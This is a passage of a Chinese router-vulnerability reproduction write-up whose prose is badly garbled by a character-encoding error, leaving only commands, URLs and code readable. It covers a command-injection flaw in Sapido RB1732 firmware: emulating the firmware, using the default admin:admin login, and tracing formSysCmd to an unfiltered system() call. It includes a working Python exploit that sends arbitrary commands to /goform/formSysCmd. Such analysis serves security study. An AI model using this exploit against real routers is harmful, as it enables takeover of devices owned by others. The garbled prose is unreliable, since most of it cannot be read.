½ðÖÇÑóSapidoÊÇ̨Íå¸ÖÌú¼¯ÍÅרΪ IoT ÎïÁªÍø¼¼ÊõËùͶ×ÊµÄÆ·ÅƿƼ¼¹«Ë¾£¬×¨ÃÅÉè¼Æ¿ª·¢ÖÇ»ÛÈ«ÎÞÏß±£È«ÏµÍ³¼°Ó²ÌåÉ豸£¬Í¬Ê±ÓµÓÐAPPµÄÑз¢ÄÜÁ¦£¬¿ç×ãÖǻۼÒÍ¥ SMART HOME TOTAL SOLUTION ¼° ÖÇÄÜÖÆÔì & ERPµÈÈ«·½Î»ÆóÒµÕûºÏ·½°¸£¬ÌṩÎÞÏß·ÖÏíÆ÷ÍøÍ¨²úÆ·¡¢Öǻ۲å×ù¡¢¼à¿Ø±£È«µÈ²úÆ·¡£½ðÖÇÑóSapidoƾ½åרҵµÄÑз¢ÍŶӼ°ÐÐÏúÊг¡µÄ¹æ»®£¬Éî¸ų̂Í壬¼á³Ǫ̈ÍåÖÆÔ죬²¢ÈÙ»ñ̨ÍåΨһӵÓÐMIT΢Ц±êÕµÄÍøÂ·Í¨Ñ¶ÆóÒµ£¬ÇÒÖÁ½ñÒÑÀÛ»ý50×ų̀Í徫Ʒ½±µÄÊâÈÙ£¬»ñ°ą̈Í徫ƷÖÕÉí³É¾Í½±¡£2019Äê¸ÃÆì϶à¸öÐͺÅ·ÓÉÆ÷´æÔÚδÊÚȨÃüÁîÖ´ÐЩ¶´£¬¿É±»ºÚ¿Í½øÐжñÒâÀûÓá£Ö÷ÒªÓ°ÏìµÄ°æ±¾ÎªBR270n-v2.1.03¡¢BRC76n-v2.1.03¡¢GR297-v2.1.3¡¢RB1732-v2.0.43¼°Ö®Ç°µÄ°æ±¾¡£
ÔÚÕâÀï¸Ã¹Ì¼þµÄ»·¾³Ä£ÄâÖ÷Ҫͨ¹ýfirmware-analysis-toolkit¹¤¾ßʵÏÖ£¬¸Ã¹¤¾ß¼¯³ÉÁËÖ÷Á÷µÄ¼¸¿î×Ô¶¯»¯¹Ì¼þÄ£Ä⹤¾ß¡£ÕâÀïÍÆ¼ö´ó¼ÒÏÂÔØattifyos3.0£¬ÆäÖÐÒѰ²×°firmware-analysis-toolkit¹¤¾ß
attifyos3.0ÏÂÔØµØÖ·£ºhttps://pan.baidu.com/s/1-UQOBax1-t8EFVrzGvEhVQÌáÈ¡Â룺zshs
±¾´Î©¶´·ÖÎöËùʹÓõĹ̼þ°æ±¾Îª£ºRB-1732_TC_v2.0.43
¹Ì¼þÏÂÔØµØÖ·£ºhttps://share.weiyun.com/5Z9kOYc
½øÈëattifyosÐéÄâ»úÖУ¬Çл»Ä¿Â¼ÖÁ¡«/tools/firmware-analysis-toolkit

½«RB-1732_TC_v2.0.43.bin·ÅÖõ½ÐéÄâ»úÖУ¬ÔÚÕâÀïÎÒµÄλÖÃΪ/home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin

ÔÚÃüÁîÐÐÖÐÖ´ÐÐ python3 fat.py /home/iot/Desktop/firewalk/RB-1732_TC_v2.0.43.bin

ÕâÀïÊ×ÏÈ»á½øÐÐÍøÂçµÄ×Ô¶¯»¯ÅäÖ㬵±ÏÔʾbr0µÄÍøÂçµØÖ·Ê±£¬±íʾģÄâÆ÷ÍøÂçÒÑÅäÖú㬼Çס´ËʱµÄbr0µØÖ·Îª192.168.1.1

´Ëʱ»Ø³µ£¬½øÐй̼þµÄ²¿Êð£¬ÉÔµÈÆ¬¿Ì£¬ÏÔʾÈçÏÂͼÔò±íʾ»·¾³ÒѲ¿ÊðÍê³É

·ÃÎÊhttp://192.168.1.1/admin.asp£¬´ËʱÏÔʾ·ÓÉÆ÷µÄ¹ÜÀíÒ³Ãæ£¬Ä¬ÈÏÕ˺ÅÃÜÂëΪadmin:admin£¬±íʾ»·¾³ÒÑÄ£ÄâÍê³É
ʹÓÃadmin:adminĬÈÏÕ˺ŵǼºǫ́£¬Ò³ÃæÏÔʾÈçÏÂ

½ÓÏÂÀ´·ÃÎÊhttp://192.168.1.1/syscmd.asp£¬½øÈëµ½ÃüÁîÖ´ÐÐÒ³

ÊäÈëifconfigÃüÁ³É¹¦Ö´ÐÐ

ͨ¹ý©¶´ÀûÓýű¾Ö´Ðнá¹ûÈçÏÂ

rb1732_exploit.py½Å±¾ÄÚÈÝÈçÏÂ
import requestsimport sysdef test_httpcommand(ip, command): my_data = {'sysCmd': command, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''} r = requests.post('http://%s/goform/formSysCmd' % ip, data = my_data) content = r.text content = content[ content.find('<textarea rows="15" name="msg" cols="80" wrap="virtual">')+56: content.rfind('</textarea>')] return content print test_httpcommand(sys.argv[1], " ".join(sys.argv[2:]))
¸ù¾Ýsyscmd.aspÒ³Ãæ£¬ÊäÈëifconfigÃüÁץ°ü¿ÉÖª£¬ÕæÕýÖ´ÐÐÃüÁîµÄºǫ́³ÌÐòΪ/goform/formSysCmd£¬ÃüÁîµÄ²ÎÊýÃûΪsysCmd¡£
½ÓÏÂÀ´Ê¹ÓÃbinwalk½øÐй̼þÌáÈ¡£¬³¢ÊÔ½øÐÐÔ´Âë·ÖÎö£¬ÃüÁîΪbinwalk -Me RB-1732_TC_v2.0.43.bin
ÌáÈ¡Íê³Éºó£¬»áÉú³É_RB-1732_TC_v2.0.43.bin.extractedĿ¼£¬ÆäÖб£´æÓй̼þµÄÔ´Âë
½øÈëµ½_RB-1732_TC_v2.0.43.bin.extracted/squashfs-rootÖУ¬grep -r "formSysCmd"£¬È«¾Ö²éÕÒ´æÔÚ¸Ã×Ö·ûµÄλÖÃ
¿ÉÒÔ¿´µ½£¬³ýÁËsyscmd.aspºÍobama.aspÒ³Ãæ³ÌÐò£¬Ö»ÓÐbin/websÎļþÆ¥Åäµ½£¬³õ²½ÅжÏwebs³ÌÐò²ÅÊÇÕæÕýµÄºǫ́´¦Àí³ÌÐò
file bin/webs£¬²é¿´³ÌÐòÎļþ¸ñʽ£¬Îªmips 32λ³ÌÐò
½«websÎļþ¿½±´³öÀ´£¬µ¼Èëida½øÐо²Ì¬·ÖÎö£¬view -> open subviews -> Strings²é¿´È«²¿×Ö·û´®
crtl +F ²éÕÒformSyscmd×Ö¶Î

¿ÉÒÔ¿´µ½ÓÐ2¸öλÖôæÔÚ¸Ã×ֶΣ¬·Ö±ðλÓÚ004044DBºÍ00471A44Á½¸öλÖã¬Ê×ÏÈË«»÷004044DBµÄλÖýøÈë

¼ÌÐøË«»÷formSysCmd£¬½øÈë¸Ãº¯ÊýµÄ¶¨Òå

F5½øÐз´±àÒë²é¿´Î±´úÂë

µ½ÕâÀïÎÒÃÇ¿ÉÒÔÇå³þµØ¿´µ½£¬formSysCmdº¯Êýͨ¹ýwebsGetVarº¯Êý»ñÈ¡Óû§µÄÊäÈ룬°üÀ¨ÓÐsubmit_url¡¢sysCmd¡¢writeData¡¢filename¡¢fpath¡¢readfileµÄ²ÎÊýÖµ¡£ÆäÖÐv3ΪsysCmdµÄ²ÎÊýÖµ

½ÓÏÂÀ´ÔÚûÓйýÂËv3ÖµµÄÇé¿öÏ£¬Í¨¹ýsnprintf¸ñʽ»¯Æ´½Ó×Ö·û´®£¬µÃµ½ v20= &v3 2>&1 > /tmp/syscmd.log
×îÖÕµ÷ÓÃsystemº¯ÊýÖ´ÐÐv20µÄ×Ö·û´®¡£
ÕâÀォv3ÉèÖóÉifconfig£¬ÎÒÃÇÔÚ±¾µØÖ´Ðв鿴Ч¹û£¬¿ÉÒÔ¿´µ½ÃüÁî³É¹¦Ö´ÐУ¬²¢½«½á¹û·µ»Øµ½syscmd.log£¬Òò´ËÖ»ÒªÃüÁîÔÚsyscmd²ÎÊýλÖÃÊäÈëϵͳÃüÁÔò¿Éµ¼ÖÂÃüÁîÖ´ÐЩ¶´